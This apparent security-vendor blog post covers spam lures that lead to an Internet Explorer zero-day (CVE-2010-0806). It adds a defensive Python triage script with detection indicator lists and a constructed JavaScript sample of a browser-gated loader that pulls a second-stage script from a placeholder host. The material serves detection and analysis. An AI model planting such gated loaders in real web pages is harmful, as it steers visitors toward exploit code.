Internet Explorer 0-day targeted in spam runs
- Wednesday, March 10, 2010, 7:27
- Threat Research
Hot on the heels of the Patch Tuesday announcements yesterday (see blog or links to vulnerability assessment pages), came the announcement of a new zero-day in Internet Explorer (CVE-2010-0806).
Whilst checking through some URLs supposedly serving up malicious code to exploit this vulnerability, I noticed a link to some spam runs from earlier in the week. On March 8th SophosLabs saw spam messages attempting to trick the recipient into visiting rogue web pages. Messages used at least two social engineering tricks to lure victims into clicking the malicious link.
- the tried and tested "delivery failed, please confirm address details" messages
- a request to confirm details for an insurance quote
Example messages are shown below.
In either case, clicking on the link takes the victim to a web page which kickstarts the infection process.
Generic detection for the exploit scripts seen thus far has been added as Troj/ExpJS-R. A script used to query the browser/OS version before loading the exploit script (or redirecting to a games site) has been added as Troj/JSRedir-AW.
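The redirector described above branches on browser/OS identity and then either pulls in the exploit script or sends the visitor elsewhere. As an added illustration (this is not SophosLabs code, and not the logic behind Troj/JSRedir-AW or Troj/ExpJS-R), the Python below triages JavaScript for that shape: it flags scripts in which browser-fingerprinting indicators co-occur, inside a conditional, with dynamic script loading or navigation. The two sample scripts and the example.invalid hostnames are constructed.

```python
"""Heuristic triage for 'check browser/OS, then load or redirect' JavaScript.

Added example; the indicator lists and the two sample scripts are constructed
for illustration and are not any vendor's detection signature.
"""
import re

# Indicators in the form they take once whitespace is stripped from the script.
FINGERPRINT_INDICATORS = (
    "navigator.userAgent", "navigator.appVersion", "navigator.platform",
    "MSIE", "WindowsNT",
)
LOADER_INDICATORS = (
    "document.write(", 'createElement("script")', "createElement('script')",
    ".src=", "window.location", "location.href", "location.replace(",
)
URL_RE = re.compile(r"https?://[^\s'\"<>]+")


def _compact(js):
    """Strip all whitespace so `if (x)` and `if(x)` compare alike."""
    return re.sub(r"\s+", "", js)


def extract_urls(js):
    """Return every absolute http(s) URL literal, in order of appearance."""
    return URL_RE.findall(js)


def triage(js):
    """Classify a script by which indicator groups co-occur.

    'ua-gated-loader' means the script inspects browser/OS identity and,
    inside a conditional, writes a script tag or moves the window elsewhere:
    the shape of the redirector described in the post. Fingerprinting alone
    (feature detection) or loading alone (ordinary tag managers) is reported
    separately so an analyst can dismiss it quickly.
    """
    compact = _compact(js)
    fingerprint = [i for i in FINGERPRINT_INDICATORS if i in compact]
    loader = [i for i in LOADER_INDICATORS if i in compact]
    branches = "if(" in compact
    if fingerprint and loader and branches:
        verdict = "ua-gated-loader"
    elif fingerprint:
        verdict = "fingerprint-only"
    elif loader:
        verdict = "loader-only"
    else:
        verdict = "clean"
    return {"verdict": verdict, "fingerprint": fingerprint,
            "loader": loader, "urls": extract_urls(js)}


# Constructed benign sample: sniffs the browser but only toggles a CSS class.
FEATURE_DETECT = """
var isIE = /MSIE/.test(navigator.userAgent);
if (isIE) { document.body.className += " legacy-ie"; }
"""

# Constructed sample with the shape the post describes; hosts are placeholders.
GATED_LOADER = """
var ua = navigator.userAgent;
if (ua.indexOf("MSIE") != -1 && ua.indexOf("Windows NT") != -1) {
    document.write('<script src="http://stage.example.invalid/next.js"></script>');
} else {
    window.location = "http://games.example.invalid/";
}
"""

if __name__ == "__main__":
    for name, sample in (("feature-detect", FEATURE_DETECT),
                         ("gated-loader", GATED_LOADER)):
        result = triage(sample)
        print(f"{name}: {result['verdict']}  urls={result['urls']}")
```

Treat the verdict as a triage hint rather than a detection: `.src=` on its own also matches image beacons, which is why the loader group only counts when it sits next to fingerprinting and a conditional. The extracted URLs are the part an analyst usually wants first, since they point at the second-stage host and the decoy destination.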
The malicious payloads installed in such attacks are liable to change, of course, but the ones seen thus far have been either proactively detected as Mal/Dropper-Y, (continue reading...)